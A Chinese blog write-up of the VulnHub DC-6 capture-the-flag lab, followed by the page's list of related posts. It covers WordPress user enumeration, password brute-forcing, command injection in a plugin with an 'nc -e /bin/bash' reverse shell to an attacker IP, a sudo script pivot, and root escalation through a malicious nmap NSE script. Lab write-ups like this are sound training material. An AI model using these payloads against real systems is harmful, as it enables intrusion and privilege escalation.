[Vulnhub] DC-6靶机渗透

最新推荐文章于 2024-07-16 17:01:58 发布
最新推荐文章于 2024-07-16 17:01:58 发布
阅读量146 收藏
点赞数
分类专栏: 靶场笔记 文章标签: 靶机 linux 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45605352/article/details/119488480
版权

0x00 环境搭建

靶机地址:http://www.vulnhub.com/entry/dc-6,315/
下载之后用vmware打开即可,使用桥接模式。
开机后搭建完成:
在这里插入图片描述
本关只有一个flag,且需要修改hosts文件访问:192.168.1.147 wordy

0x01 主机端口探测

arp-scan -l探测内网存活主机,再用nmap -sV -p- ip来探测端口:
在这里插入图片描述
发现开启了80端口(HTTP服务)和22端口(SSH服务)

0x02 web渗透

访问80端口,发现又是WordPress:
在这里插入图片描述扫了一下只发现了一些目录遍历漏洞,没什么利用价值。

直接用WPScan枚举用户:wpscan --url http://wordy/ --enumerate u
在这里插入图片描述
暴破密码:wpscan --url http://wordy -e u --passwords /usr/share/wordlists/rockyou.txt
在这里插入图片描述
登录后台发现插件Activity monitor
在这里插入图片描述查找相关漏洞:
在这里插入图片描述查看利用方式:
在这里插入图片描述访问漏洞页面,输入ip点击抓包:
在这里插入图片描述
写入payload:baidu.com| nc -e /bin/bash 192.168.1.143 4444
在这里插入图片描述攻击机监听,得到反弹shell:
在这里插入图片描述
获取交互式shell:python -c 'import pty;pty.spawn("/bin/bash")'

在 jens 家目录下发现一个可执行脚本,但没有权限:
在这里插入图片描述
在 mark 的家目录下发现提示 garham用户密码:
在这里插入图片描述

0x03 SSH远程连接

ssh 登录 graham用户:
在这里插入图片描述
使用sudo -l,发现可以以 jens 用户免密执行backup.sh脚本:
在这里插入图片描述
可以让 jens 执行/bin/bash就直接得到了 jens 的 shell:

echo "/bin/bash" > backups.sh
sudo -u jens ./backups.sh

在这里插入图片描述

0x04 nmap提权

nmap有执行脚本的功能,通过编写特殊脚本,可以实现利用nmap提权(sudo提权)

sudo -l查看当前用户可以以 root 身份免密执行 nmap 命令:
在这里插入图片描述
写入一个执行bashnmap脚本,运行

echo "os.execute('/bin/bash')" > /tmp/root.nse
sudo nmap --script=/tmp/root.nse

找到最终flag(这里输入的命令看不到):
在这里插入图片描述

总结

整体流程如下:
主机发现 => 端口扫描 => 访问web服务 => 暴破登录 => 利用已知漏洞RCE => nc反弹shell => 切换用户 => nmap提权 => 找到最终flag

学习了 sudo 提权,当前用户能以其他用户身份免密执行脚本时,将/bin/bash写入脚本中,令其执行,就可以获得过该用户的权限。

参考链接:
https://www.cnblogs.com/bingtang123/p/12838419.html(VulnHub::DC-6)

yAnd0n9
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
靶机实战-DC-6
滕财然的博客
03-03 807
DC-6靶机实战 文章目录DC-6靶机实战1、主机发现2、端口及端口详细信息扫描3、老规矩,访问web服务(80端口)4、提权 1、主机发现 2、端口及端口详细信息扫描 开放22、80端口 3、老规矩,访问web服务(80端口) 输入IP之后会变成http://wordy且找不到此网站 和以前一样,添加到hosts文件中//物理机和kali都添加 重新访问://这里我用的是火狐的一款插件...
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub-DC-6靶机实战(Nmap提权)
御七彩虹猫
05-19 1562
Vulnhub-DC-6靶机实战(Nmap提权)
DC-6靶机渗透学习记录
最新发布
tyut_dummy的博客
07-16 764
7.用bp抓包一下,在bp中输入baidu.com | nc -e /bin/sh 192.168.6.137 7878进行反弹shell,同时在kali中监听7878端口。6.在ID or integer的输入框中输入一个网站地址,如:baidu.com,然后点击Lookup,发现有回显。`--detection-mode`:设置扫描的侦测模式,如快速、默认或深度。例如:nmap,WPscan,burpsuite,dirb等等。得到admin,mark,graham,sarah,jens几个用户名。
DC6-靶机渗透
banacyo14206的博客
08-22 550
靶场下载链接: Download: http://www.five86.com/downloads/DC-6.zip Download (Mirror): https://download.vulnhub.com/dc/DC-6.zip Download (Torrent): https://download.vulnhub.com/dc/DC-6.zip.torrent ( ...
DC6-靶机
Au
10-30 1673
下载地址 下面是作者的提示,和爆破的字典有关 cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt 配置的环境: kali:192.168.25.131 DC6-靶机 和 kali 在同一C段 渗透 nmap扫描网段,发现存活主机 nmap -sP 192.168.25.0/...
DC-6靶机
mlws1900的博客
03-26 1601
开放了一个http和ssh服务,用浏览器打开http服务,发现无法访问,和之前一样,去修改dns文件。登录地址(wordpress的后台地址,信息搜集,目录扫描,都做到这里了,不再做演示)发现可操作/home/jens/backups.sh,打开发现是一个解压的脚本。命令注入,打开bp进行抓包,在ip那一栏填上一个网址,点击lookup。不知道为什么,我这个shell不会显示我自己打的命令,所以需要自己盲打。设置网络为nat模式,启动打开时,发现错误直接重试和点是。看了大佬的wp,发现提示写在人家官网。
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
Vulnhub靶机渗透测试 DC-9靶机
12-07
Vulnhub靶机渗透测试 DC-9靶机
Vulnhub靶机渗透测试 DC-1靶机
03-05
Vulnhub靶机渗透测试 DC-1靶机
Vulnhub DC-6
柠檬木有枝
07-14 485
nmap 扫描服务 修改 hosts 文件 发现是 wordpress wpscan --url http://wordy/ --enumerate u 查看wordpress用户 爆破得密码 mark:helpdesk01 发现 active monitor 插件 搜索 exp ,反弹 shell 发现用户名密码 python -c 'import pty;pty.spawn("/b...
渗透测试DC-6靶机
Ciyaso的博客
08-21 294
一、扫描获取靶机ip arp-scan -l 192.168.203.145 二、获取网站信息 1.nmap nmap -sV -A 192.168.203.145 开放了22、80端口 访问主页,发现访问不了,和DC-2一样存在重定向,需要修改hosts文件 成功访问 2.Wappaloyzer CMS:WordPress 操作系统:Debian 数据库:Mysql Web服务器:Apache 2.4.25 3.wpscan 由于使用的是WordPress,所以我们使用wpsacn进行扫描
Vulnhub_DC-6
高野02blog
01-20 148
Vulnhub提示: 扫描靶机IP地址:nmap -sP 192.168.10.0/24 扫描端口信息:nmap -sV -p 1-65535 -A 192.168.10.129 开放端口22,80 访问80端口发现URL被重定向到wordy 我们需要在host文件中添加 文件位置 /etc/hosts 可以访问到啦 扫描下目录结构吧, 御剑扫描 发现是wordpress站点 使用WPscan扫描 一款专注于wordpress站点扫描工具 wpscan -url
VulnHubDC-6
weixin_39219503的博客
02-01 312
01 环境搭建 靶机环境下载:https://www.vulnhub.com/entry/dc-6,315/ 题目信息如下 Description DC-6 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing. T...
vulnhubDC6靶机
LainWith的博客
02-14 547
目录介绍信息收集主机发现主机信息探测访问网站wpscan测试站点登录站点反弹shell信息收集提权 介绍 系列: DC(此系列共10台) 发布日期:2019 年 4 月 26 日 难度:初级-中级 Flag:获取root权限,并拿到唯一的flag 学习: ● wordpress 安全测试 ● 本地代码执行 ● nmap 提权 靶机地址:https://www.vulnhub.com/entry/dc-6,315/ 提示信息: 靶机支持Virtualbox和Vmware 需要修改hosts文件,如:192.
vulnhub靶场之DC-6
qq_58091216的博客
01-11 1156
只有一个flag。
vulnhub-dc6-DC6
yutianovo的博客
10-06 349
靶机描述 DESCRIPTION DC-6 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing. This isn't an overly difficult challenge so should be great for beginners. The ultimate goal of this challenge is t
渗透DC-1靶机设计思路
05-24
1. 确定目标:首先需要确定渗透的目标,即DC-1靶机。 2. 收集信息:收集关于DC-1的信息,如IP地址、开放端口、操作系统等。可以使用工具如nmap、whois、dnsrecon等进行信息搜集。 3. 扫描漏洞:使用漏洞扫描工具如...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值